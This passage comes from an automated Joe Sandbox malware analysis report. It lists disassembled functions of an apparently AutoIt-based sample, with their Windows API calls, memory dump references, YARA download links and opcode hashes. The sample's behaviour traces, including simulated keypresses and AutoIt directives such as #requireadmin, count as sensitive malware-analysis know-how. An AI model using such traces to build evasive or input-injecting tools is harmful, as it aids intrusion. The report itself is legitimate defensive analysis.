                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                          • Opcode ID: ad70080100014d82c3f7356dedf8fff72ef5e01f876831c956b634b36eb76d07
                                                                                                                                                          • Instruction ID: d15266fee45363691407a46fdee04b88487df5af6ff0f375dba16d58f0344f87
                                                                                                                                                          • Opcode Fuzzy Hash: ad70080100014d82c3f7356dedf8fff72ef5e01f876831c956b634b36eb76d07
                                                                                                                                                          • Instruction Fuzzy Hash: EB51E4A0A487D13EFB3A4774CC45BBBBEA95B06308F088589E1D5468C2C7D8ECE8D750
                                                                                                                                                          Function 001645F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetParent.USER32(00000000), ref: 00164638
                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0016464D
                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 001646AE
                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001646DA
                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001646F7
                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0016473B
                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0016475C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                          • Opcode ID: fa0f4b1e20af546bc620b4da8f207d87405ed285e1eccf20fd24b04bc419ace1
                                                                                                                                                          • Instruction ID: 2b51df84784bd58f5f797c59f52a86e687edbeae7ea1d032718e8352a03ddb2c
                                                                                                                                                          • Opcode Fuzzy Hash: fa0f4b1e20af546bc620b4da8f207d87405ed285e1eccf20fd24b04bc419ace1
                                                                                                                                                          • Instruction Fuzzy Hash: 3F51D6A19047D63FFB368734CC45BB6BFA96B07304F088589E1D9568C2D394ECA8D760
                                                                                                                                                          Function 001686AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcsncpy$LocalTime
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2945705084-0
                                                                                                                                                          • Opcode ID: 7d4bf8f16363ac93098d00e78fe65a5d3b370c2622acadbfe278b5837b18881c
                                                                                                                                                          • Instruction ID: 65994eeca6c222e1e35d3cd251a49ea66d696f59a533c17b29f66330570b073d
                                                                                                                                                          • Opcode Fuzzy Hash: 7d4bf8f16363ac93098d00e78fe65a5d3b370c2622acadbfe278b5837b18881c
                                                                                                                                                          • Instruction Fuzzy Hash: 75413D65C1121475CB10EBB4CC86ADEB7BCAF15310FA08966F514F3131EB70E6A587E5
                                                                                                                                                          Function 00189D97 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00189DB0
                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00189E57
                                                                                                                                                          • IsMenu.USER32(?), ref: 00189E6F
                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00189EB7
                                                                                                                                                          • DrawMenuBar.USER32 ref: 00189ED0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 3866635326-4108050209
                                                                                                                                                          • Opcode ID: 54eedc3e13d3b047aaba86b0b73b56b96ac592d32e386b2045ff8d842a298694
                                                                                                                                                          • Instruction ID: f5327b8ef2c523476b5256530993813e6c851801552ae0e37dd6336b348e8e2d
                                                                                                                                                          • Opcode Fuzzy Hash: 54eedc3e13d3b047aaba86b0b73b56b96ac592d32e386b2045ff8d842a298694
                                                                                                                                                          • Instruction Fuzzy Hash: EA411875A00209EFDB20EF98D884EAABBF5FF05354F088029E95597650D730EE50CF50
                                                                                                                                                          Function 00188DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00188DF4
                                                                                                                                                          • GetWindowLongW.USER32(01735D98,000000F0), ref: 00188E27
                                                                                                                                                          • GetWindowLongW.USER32(01735D98,000000F0), ref: 00188E5C
                                                                                                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00188E8E
                                                                                                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00188EB8
                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00188EC9
                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00188EE3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2178440468-0
                                                                                                                                                          • Opcode ID: 82fc7cdd33400c7727193c5648fccc2aa007dda90e4cc894dec866131fabbeaa
                                                                                                                                                          • Instruction ID: 182894e2cabcd79a76a4ac17f8322cadf5288110b63ffd9be8abe202259c4400
                                                                                                                                                          • Opcode Fuzzy Hash: 82fc7cdd33400c7727193c5648fccc2aa007dda90e4cc894dec866131fabbeaa
                                                                                                                                                          • Instruction Fuzzy Hash: A5310131200650AFDB24AF98EC84F5937A5FB4A714F5941A4F9068F6A2CB71AD809F40
                                                                                                                                                          Function 001616F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00161734
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0016175A
                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0016175D
                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 0016177B
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00161784
                                                                                                                                                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 001617A9
                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 001617B7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                          • Opcode ID: 165eb06ad54eda68621f4cceb906f5b12fa2aebb1a666439061830c88a6c573f
                                                                                                                                                          • Instruction ID: 1d8ee28726e113d02f6ca4b1ede5f92925037c6173bba12a0d3df0e2eef19b10
                                                                                                                                                          • Opcode Fuzzy Hash: 165eb06ad54eda68621f4cceb906f5b12fa2aebb1a666439061830c88a6c573f
                                                                                                                                                          • Instruction Fuzzy Hash: B2219275600219BF9B109FA8DC88CEB73EDFB0D7607448125FA15DB650D774EC818760
                                                                                                                                                          Function 00162FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __wcsnicmp
                                                                                                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                          • API String ID: 1038674560-2734436370
                                                                                                                                                          • Opcode ID: 771dccf20acdfb82dc3f2da410fb83c6d9a3e891de5b5ff7daf0a2d3eace7a29
                                                                                                                                                          • Instruction ID: 6ed794a08439d52e28645b751225c8a8f5780e52949e1a021e3622da9e7eee36
                                                                                                                                                          • Opcode Fuzzy Hash: 771dccf20acdfb82dc3f2da410fb83c6d9a3e891de5b5ff7daf0a2d3eace7a29
                                                                                                                                                          • Instruction Fuzzy Hash: 7221383220462176D235A634AC06FBBB3E8DF69310F544029F99587191EBB19AA6C395
                                                                                                                                                          Function 001617C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0016180D
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00161833
                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00161836
                                                                                                                                                          • SysAllocString.OLEAUT32 ref: 00161857
                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 00161860
                                                                                                                                                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 0016187A
                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00161888
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                          • Opcode ID: 5011309f29e7e7e84057f58b3831900370f95025b72099dd5253134ac57a60cf
                                                                                                                                                          • Instruction ID: f243cb0a39607b7e815f0251f5f29f167f16410ab782462cf8224b9d98278f94
                                                                                                                                                          • Opcode Fuzzy Hash: 5011309f29e7e7e84057f58b3831900370f95025b72099dd5253134ac57a60cf
                                                                                                                                                          • Instruction Fuzzy Hash: 75217175600204BF9B109BA9DC88DBA77ECEB0E3607448525F915DB6A0DB74EC818B60
                                                                                                                                                          Function 0018A0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013C657
                                                                                                                                                            • Part of subcall function 0013C619: GetStockObject.GDI32(00000011), ref: 0013C66B
                                                                                                                                                            • Part of subcall function 0013C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0013C675
                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0018A13B
                                                                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0018A148
                                                                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0018A153
                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0018A162
                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0018A16E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                          • String ID: Msctls_Progress32
                                                                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                                                                          • Opcode ID: 5066e946edf0b61954a783c713e19b6e91a3919ef50a947437906f567f42f79e
                                                                                                                                                          • Instruction ID: 5101f935b8b02638850b5fd69daf1e91863d199635feb6e5184fae79f29faa0c
                                                                                                                                                          • Opcode Fuzzy Hash: 5066e946edf0b61954a783c713e19b6e91a3919ef50a947437906f567f42f79e
                                                                                                                                                          • Instruction Fuzzy Hash: F51190B1140219BFEF159F60CC86EEB7F5DEF08798F014215FA08A6090C7729C21DBA0
                                                                                                                                                          Function 00144C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __getptd_noexit.LIBCMT ref: 00144C3E
                                                                                                                                                            • Part of subcall function 001486B5: GetLastError.KERNEL32(?,00140127,001488A3,00144673,?,?,00140127,?,0012125D,00000058,?,?), ref: 001486B7
                                                                                                                                                            • Part of subcall function 001486B5: __calloc_crt.LIBCMT ref: 001486D8
                                                                                                                                                            • Part of subcall function 001486B5: GetCurrentThreadId.KERNEL32 ref: 00148701
                                                                                                                                                            • Part of subcall function 001486B5: SetLastError.KERNEL32(00000000,00140127,001488A3,00144673,?,?,00140127,?,0012125D,00000058,?,?), ref: 00148719
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00144C1D), ref: 00144C52
                                                                                                                                                          • __freeptd.LIBCMT ref: 00144C59
                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000,?,00144C1D), ref: 00144C61
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00144C1D), ref: 00144C91
                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000,?,?,00144C1D), ref: 00144C98
                                                                                                                                                          • __freefls@4.LIBCMT ref: 00144CB4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1445074172-0
                                                                                                                                                          • Opcode ID: e03eb5d89623dd948da377c4a4d997cf80294d5548a3456b71c58afebcee1287
                                                                                                                                                          • Instruction ID: 1f5e308a78aee7ba3fc5b3baa638a81147543186b518c15ead723f1eb26fb910
                                                                                                                                                          • Opcode Fuzzy Hash: e03eb5d89623dd948da377c4a4d997cf80294d5548a3456b71c58afebcee1287
                                                                                                                                                          • Instruction Fuzzy Hash: 650126B4401B01AFCB19BB74E949A0E7BE5FF253157148518F809CBA72EF34D8828B91
                                                                                                                                                          Function 0013C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0013C6C0
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0013C701
                                                                                                                                                          • ScreenToClient.USER32(?,000000FF), ref: 0013C729
                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0013C856
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0013C86F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1296646539-0
